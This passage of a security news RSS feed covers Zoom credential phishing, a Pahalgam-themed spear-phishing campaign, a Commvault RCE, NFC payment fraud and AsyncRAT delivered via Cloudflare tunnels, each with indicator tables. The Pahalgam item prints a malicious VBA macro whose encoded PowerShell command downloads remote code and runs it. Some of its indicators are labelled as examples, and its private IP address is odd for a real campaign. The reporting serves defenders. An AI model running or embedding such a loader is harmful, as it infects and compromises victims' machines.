<p>The scam also plays on urgency and fear of missing important meetings, making users more likely to click without thinking.</p>



<p>To stay safe, users should avoid clicking suspicious links and verify unexpected invites directly with coworkers. Companies should use strong email filters, train staff on phishing awareness, and enable multi-factor authentication (MFA) to protect against stolen passwords.</p>



<h2 class="wp-block-heading"><strong>Indicators of Compromise (IoCs)</strong></h2>



<figure class="wp-block-table"><table><thead><tr><th><strong>Type</strong></th><th><strong>Indicator</strong></th></tr></thead><tbody><tr><td>URL</td><td>hxxps://tracking[.]cirrusinsight[.]com/e39ee0e9-c6e2-4294-8151-db8d9e454e24/one-ebext-in-openurl#targetid=john[.]doe@company[.]com&amp;uname=john[.]doe&amp;4030483277383-2874893</td></tr><tr><td>URL</td><td>hxxps://pub-51656ae3d0ef4f2ba59cdfc6830c8098[.]r2[.]dev/meeting[.]htm?utm_campaign=8634688-zm-30000&amp;utm_source=ppc#targetid=john[.]doe@company[.]com&amp;uname=john[.]doe&amp;4030483277383-2874893</td></tr><tr><td>POST Endpoint</td><td>hxxps://api[.]telegram[.]org/bot7643846141:AAH3xkttszS0hQgqj7PaS_f7XetLz-_DTQc/sendMessage</td></tr></tbody></table></figure>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p><strong>&#x200d;Follow Us on:<strong> <a href="https://twitter.com/Info_FHNews" target="_blank" rel="noreferrer noopener">Twitter</a>,<a href="https://www.instagram.com/first_hackers_news/" target="_blank" rel="noreferrer noopener"> Instagram</a>, <a href="https://www.linkedin.com/in/firsthackers-news/" target="_blank" rel="noreferrer noopener">Facebook</a></strong> to get the latest security news!</strong></p>
</blockquote>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/zoom/">Zoom Phishing Steals Login Credentials</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/zoom/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Pahalgam Attack Lure Used in Cyberattacks Against Indian Government</title>
		<link>https://firsthackersnews.com/pahalgam-attack-lure/</link>
					<comments>https://firsthackersnews.com/pahalgam-attack-lure/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Mon, 05 May 2025 17:26:00 +0000</pubDate>
				<category><![CDATA[Compromised]]></category>
		<category><![CDATA[BOTNET]]></category>
		<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[cyberattacks]]></category>
		<category><![CDATA[emails]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[security advisory]]></category>
		<category><![CDATA[security fix]]></category>
		<category><![CDATA[security update]]></category>
		<category><![CDATA[spear phishing]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=10143</guid>

					<description><![CDATA[<p>In a targeted cyber espionage campaign, attackers are using fake documents referencing the recent Pahalgam attack to go</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/pahalgam-attack-lure/">Pahalgam Attack Lure Used in Cyberattacks Against Indian Government</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>In a targeted cyber espionage campaign, attackers are using fake documents referencing the recent Pahalgam attack to go after Indian government personnel. Discovered in early May 2025, the campaign relies on spear-phishing emails with attachments meant to exploit officials&#8217; interest in the ongoing security situation. </p>



<p>These emails are crafted to appear as if they come from legitimate government sources, making them more convincing. The attached Word documents contain embedded macros that, once enabled, trigger a multi-stage malware infection.</p>



<p>The malicious documents are disguised as official briefings or intelligence reports about the Pahalgam incident. They prompt recipients to “Enable Content” to view the file, which silently activates hidden malware.</p>



<p>The attackers designed these files with realistic letterheads and formatting to mimic genuine government communications. Seqrite researchers discovered the campaign after noticing unusual network traffic from government systems.</p>



<p>Their analysis revealed a previously unknown Remote Access Trojan (RAT) that stays hidden on infected devices and connects to servers linked to a known nation-state group that has targeted Indian government agencies in the past.</p>



<p>Experts believe this is a highly targeted and sophisticated operation, aimed at collecting sensitive information from defense, intelligence, and law enforcement networks. The campaign’s timing—right after the Pahalgam attack—shows the attackers are using current events to increase their success.</p>



<h2 class="wp-block-heading"><strong>All about the attack</strong></h2>



<p>The attack starts when victims open a file named “Pahalgam_Incident_Report_Confidential.docx”. If they enable macros, hidden VBA code runs a PowerShell command to launch the malware.</p>



<p>Sub AutoOpen()<br>Dim str As String<br>str = &#8220;powershell.exe -nop -w hidden -e JGM9KChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTkyLjE2OC40NS4xMDUvYy5wbmcnKTtpZXggJGM=&#8221;<br>Shell str, vbHide<br>End Sub</p>



<p>The PowerShell command downloads more malware hidden in a fake PNG file. It sets up persistence using scheduled tasks and Registry changes, then gathers system info, steals data, and tries to spread across government networks.</p>



<h2 class="wp-block-heading"><strong>Indicators of Compromise (IOCs)</strong></h2>



<figure class="wp-block-table"><table><thead><tr><th><strong>Category</strong></th><th><strong>Indicator</strong></th></tr></thead><tbody><tr><td><strong>Phishing Documents</strong></td><td>c4fb60217e3d43eac92074c45228506a, 172fff2634545cf59d59c179d139e0aa (examples)</td></tr><tr><td><strong>Phishing Domains</strong></td><td>jkpolice[.]gov[.]in[.]kashmirattack[.]exposed, iaf[.]nic[.]in[.]ministryofdefenceindia[.]org</td></tr><tr><td><strong>Phishing URLs</strong></td><td>hxxps://jkpolice[.]gov[.]in[.]kashmirattack[.]exposed/service/home/ (example)</td></tr><tr><td><strong>PPAM/XLAM</strong></td><td>d946e3e94fec670f9e47aca186ecaabe (example)</td></tr><tr><td><strong>Crimson RAT</strong></td><td>026e8e7acb2f2a156f8afff64fd54066 (example), IP: 93.127.133.58 (Ports: 1097, etc.)</td></tr></tbody></table></figure>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/pahalgam-attack-lure/">Pahalgam Attack Lure Used in Cyberattacks Against Indian Government</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/pahalgam-attack-lure/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Commvault RCE Exploited, PoC Available</title>
		<link>https://firsthackersnews.com/cve-2025-34028/</link>
					<comments>https://firsthackersnews.com/cve-2025-34028/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Thu, 24 Apr 2025 16:50:05 +0000</pubDate>
				<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[BOTNET]]></category>
		<category><![CDATA[Compromised]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[Commvault RCE]]></category>
		<category><![CDATA[exploitation]]></category>
		<category><![CDATA[security advisory]]></category>
		<category><![CDATA[security fix]]></category>
		<category><![CDATA[security flaw]]></category>
		<category><![CDATA[security patch]]></category>
		<category><![CDATA[security update]]></category>
		<category><![CDATA[security vulnerability]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=10084</guid>

					<description><![CDATA[<p>A major remote code execution (RCE) vulnerability, CVE-2025-34028, has been discovered in Commvault’s on-premise backup and recovery software,</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/cve-2025-34028/">Commvault RCE Exploited, PoC Available</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>A major remote code execution (RCE) vulnerability, CVE-2025-34028, has been discovered in Commvault’s on-premise backup and recovery software, posing serious risks to enterprises and managed service providers worldwide.</p>



<h2 class="wp-block-heading"><strong>Commvault RCE &#8211; CVE-2025-34028</strong></h2>



<p>The flaw allows attackers to execute malicious code without authentication. After researchers released a working proof-of-concept exploit, threat actors began actively scanning for vulnerable systems.</p>



<p>Commvault, widely used for enterprise backup and data protection, now faces scrutiny as the flaw undermines trust in backup security. Experts warn that if backup systems are compromised, recovery from ransomware becomes nearly impossible.</p>



<h2 class="wp-block-heading"><strong>CVE-2025-34028 Exploitation: From SSRF to RCE</strong></h2>



<p>A critical vulnerability has been found in Commvault’s on-premise software. The issue lies in an API endpoint (<code>/commandcenter/deployWebpackage.do</code>) meant for internal use. However, it can be accessed without authentication, allowing attackers to perform dangerous actions.</p>



<p>By exploiting this flaw, attackers can:</p>



<ul class="wp-block-list">
<li>Trick the server into making internal requests (SSRF).</li>



<li>Use directory traversal to write files in sensitive locations.</li>



<li>Upload and run malicious code like webshells, leading to full remote code execution (RCE).</li>
</ul>



<p>Researchers showed that attackers can drop and execute arbitrary JSP files on the server, completely compromising it.</p>



<p>A working proof-of-concept is now public, and attackers are already scanning for vulnerable systems.</p>



<h2 class="wp-block-heading"><strong>Urgent Steps to Stay Protected</strong></h2>



<ul class="wp-block-list">
<li><strong>Update Now:</strong> Commvault has released security patches. All users should apply them right away.</li>



<li><strong>Watch for Suspicious Activity:</strong> Check for strange deployment requests, unknown files in web folders, or unusual outgoing traffic.</li>



<li><strong>Limit Internet Access:</strong> Keep backup tools and management panels off the public internet whenever possible.</li>
</ul>



<p>This CVE-2025-34028 case is a clear warning — even security tools can become threats if not properly maintained.</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/cve-2025-34028/">Commvault RCE Exploited, PoC Available</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/cve-2025-34028/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>NFC Exploited to Steal Funds from ATMs and POS</title>
		<link>https://firsthackersnews.com/nfc-technology/</link>
					<comments>https://firsthackersnews.com/nfc-technology/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Wed, 23 Apr 2025 16:45:44 +0000</pubDate>
				<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[BOTNET]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[Regulation]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[NFC Exploited]]></category>
		<category><![CDATA[security advisory]]></category>
		<category><![CDATA[security fix]]></category>
		<category><![CDATA[security flaw]]></category>
		<category><![CDATA[security patch]]></category>
		<category><![CDATA[security update]]></category>
		<category><![CDATA[Steal Funds]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=10080</guid>

					<description><![CDATA[<p>NFC Technology Abused in Global ATM and POS Fraud Cybercriminals, mainly from Chinese underground networks, are using NFC</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/nfc-technology/">NFC Exploited to Steal Funds from ATMs and POS</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<h2 class="wp-block-heading"><strong>NFC Technology Abused in Global ATM and POS Fraud</strong></h2>



<p>Cybercriminals, mainly from Chinese underground networks, are using NFC (Near Field Communication) technology to carry out large-scale fraud at ATMs and point-of-sale (POS) terminals.</p>



<p>According to Resecurity, many banks, FinTech firms, and credit unions reported a sharp rise in NFC-based fraud in early 2025. One major U.S. financial institution lost millions as a result.</p>



<p>These attackers use advanced tools to manipulate NFC systems and make unauthorized payments. Targets include regions like the U.S., UK, EU, Australia, Canada, Japan, and the UAE.</p>



<p><strong>How the Fraud Works</strong></p>



<p>The attackers take advantage of Android’s Host Card Emulation (HCE), which lets phones act like payment cards. Tools like “Z-NFC” and “Track2NFC”—sold on the Dark Web—are used to steal payment data and simulate legitimate transactions at ATMs and POS terminals.</p>



<p>Some techniques, like “Ghost Tap,” allow payments without alerting payment processors. Others use apps like “HCE Bridge” to fake contactless payment methods.</p>



<p>Resecurity found that these tools are designed to hide from detection, using complex code and encryption. Some criminals even operate mobile device &#8220;farms&#8221; to commit fraud on a large scale.</p>



<p><strong>Global Impact</strong></p>



<p>Hackers have targeted major banks like Barclays, HSBC, and Santander. They also abuse loyalty programs and use stolen card data from ATM skimmers to make contactless payments that don’t require PINs.</p>



<p>NFC-enabled terminals are often misused or registered with fake identities, allowing fraud and money laundering in countries like China, Malaysia, and Nigeria.</p>



<p>With nearly 2 billion devices supporting NFC worldwide, and the privacy of encrypted communication, these crimes are hard to trace. As more people use contactless payments, stronger security and international cooperation are essential to stop this growing threat.</p>



<h2 class="wp-block-heading"><strong>Indicators of Compromise (IOC)</strong></h2>



<figure class="wp-block-table"><table><thead><tr><th>Indicator</th><th>Description</th></tr></thead><tbody><tr><td>Package Name</td><td>com.hk.nfc.paypay</td></tr><tr><td>App Name</td><td>Often disguised as utility/NFC tool</td></tr><tr><td>Native Libraries</td><td>libjiagu.so, libjgdtc.so</td></tr><tr><td>Path</td><td>/data/data/&lt;pkg&gt;/.jiagu/libjiagu_64.so</td></tr><tr><td>Class</td><td>com.stub.StubApp</td></tr><tr><td>Suspicious String</td><td>“entryRunApplication” – real app class</td></tr><tr><td>Permissions</td><td>NFC, Camera, Internet, Storage access</td></tr><tr><td>URL</td><td><a href="https://znfcqwe.top/" target="_blank" rel="noreferrer noopener">https[:]//</a><a href="https://znfcqwe.top/" target="_blank" rel="noopener">znfcqwe.top</a></td></tr></tbody></table></figure>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p><strong>&#x200d;Follow Us on:<strong> <a href="https://twitter.com/Info_FHNews" target="_blank" rel="noreferrer noopener">Twitter</a>,<a href="https://www.instagram.com/first_hackers_news/" target="_blank" rel="noreferrer noopener"> Instagram</a>, <a href="https://www.linkedin.com/in/firsthackers-news/" target="_blank" rel="noreferrer noopener">Facebook</a></strong> to get the latest security news!</strong></p>
</blockquote>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/nfc-technology/">NFC Exploited to Steal Funds from ATMs and POS</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/nfc-technology/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Hackers Leverage Cloudflare for RAT Deployment</title>
		<link>https://firsthackersnews.com/asyncrat-2/</link>
					<comments>https://firsthackersnews.com/asyncrat-2/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Tue, 22 Apr 2025 15:39:00 +0000</pubDate>
				<category><![CDATA[BOTNET]]></category>
		<category><![CDATA[Compromised]]></category>
		<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[cloudflare]]></category>
		<category><![CDATA[remote access trojan]]></category>
		<category><![CDATA[security advisory]]></category>
		<category><![CDATA[security fix]]></category>
		<category><![CDATA[security flaw]]></category>
		<category><![CDATA[security update]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=10060</guid>

					<description><![CDATA[<p>Hackers have been using Cloudflare tunnels since February 2024 to host malware and spread remote access trojans like</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/asyncrat-2/">Hackers Leverage Cloudflare for RAT Deployment</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Hackers have been using Cloudflare tunnels since February 2024 to host malware and spread remote access trojans like AsyncRAT, according to Sekoia TDR.</p>



<p>Complex malware attacks are using phishing emails disguised as invoices or orders. These emails contain an uncommon file type, application/windows-library+xml, which can bypass some email filters.</p>



<p>When opened, the file connects to a WebDAV resource hosted on Cloudflare, triggering a multi-step infection process.</p>



<p>The user is led to open a shortcut (LNK) file that launches an HTML Application (HTA) instead of a PDF. This HTA file runs a script that installs Python using PowerShell, helping the malware remain hidden and continue its execution.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="675" src="https://firsthackersnews.com/wp-content/uploads/2025/04/image-14-1024x675.png" alt="" class="wp-image-10061" srcset="https://firsthackersnews.com/wp-content/uploads/2025/04/image-14-200x132.png 200w, https://firsthackersnews.com/wp-content/uploads/2025/04/image-14-300x198.png 300w, https://firsthackersnews.com/wp-content/uploads/2025/04/image-14-400x264.png 400w, https://firsthackersnews.com/wp-content/uploads/2025/04/image-14-600x396.png 600w, https://firsthackersnews.com/wp-content/uploads/2025/04/image-14-768x506.png 768w, https://firsthackersnews.com/wp-content/uploads/2025/04/image-14-800x528.png 800w, https://firsthackersnews.com/wp-content/uploads/2025/04/image-14-1024x675.png 1024w, https://firsthackersnews.com/wp-content/uploads/2025/04/image-14-1200x791.png 1200w, https://firsthackersnews.com/wp-content/uploads/2025/04/image-14-1536x1013.png 1536w, https://firsthackersnews.com/wp-content/uploads/2025/04/image-14.png 1600w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>&nbsp;Infection chains distributing AsyncRAT</em><br></figcaption></figure>



<p>To avoid detection, attackers hide installation folders and use cleanup scripts. They ensure persistence by placing malicious scripts in the Windows Startup folder, allowing the malware to run after every reboot.</p>



<h2 class="wp-block-heading"><strong>Detection and Monitoring Efforts</strong></h2>



<p>Sekoia uses a mix of Sigma rules and custom queries in their SOL language to detect different stages of the attack — from suspicious email attachments to PowerShell commands.</p>



<p>Rules like “Suspicious Email Attachment Received” and “Mshta Suspicious Child Process” help identify malicious activity and command-and-control behavior.</p>



<p>The report highlights how hard it is to detect these advanced threats, especially with attackers using trusted infrastructure and clever evasion tactics.</p>



<p>Sekoia TDR continues to track these threats and improve their detection tools. Their research shows the need for real-time threat intelligence and strong monitoring to stay ahead of cybercriminals.</p>



<h2 class="wp-block-heading"><strong>IOCs</strong></h2>



<figure class="wp-block-table"><table><thead><tr><th><strong>Type</strong></th><th><strong>Indicator</strong></th></tr></thead><tbody><tr><td>Command and Control</td><td>malawi-light-pill-bolt[.]trycloudflare[.]com</td></tr><tr><td></td><td>players-time-corresponding-th[.]trycloudflare[.]com</td></tr><tr><td></td><td>spaces-corner-notices-battery[.]trycloudflare[.]com</td></tr><tr><td></td><td>xi-if-grows-valued[.]trycloudflare[.]com</td></tr><tr><td></td><td>phvnmarch8787[.]duckdns[.]org</td></tr><tr><td>Files</td><td>0d8d46ec44e737e6ef6cd7df8edf95d83807e84be825ef76089307b399a6bcbb (mslibrary attachment)</td></tr><tr><td></td><td>c935cc41342794c23d640333a1ddd511f9c51e5b790261dc848ec5f7ac28650a (ben.bat)</td></tr></tbody></table></figure>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p><strong>&#x200d;Follow Us on:<strong> <a href="https://twitter.com/Info_FHNews" target="_blank" rel="noreferrer noopener">Twitter</a>,<a href="https://www.instagram.com/first_hackers_news/" target="_blank" rel="noreferrer noopener"> Instagram</a>, <a href="https://www.linkedin.com/in/firsthackers-news/" target="_blank" rel="noreferrer noopener">Facebook</a></strong> to get the latest security news!</strong></p>
</blockquote>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/asyncrat-2/">Hackers Leverage Cloudflare for RAT Deployment</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/asyncrat-2/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
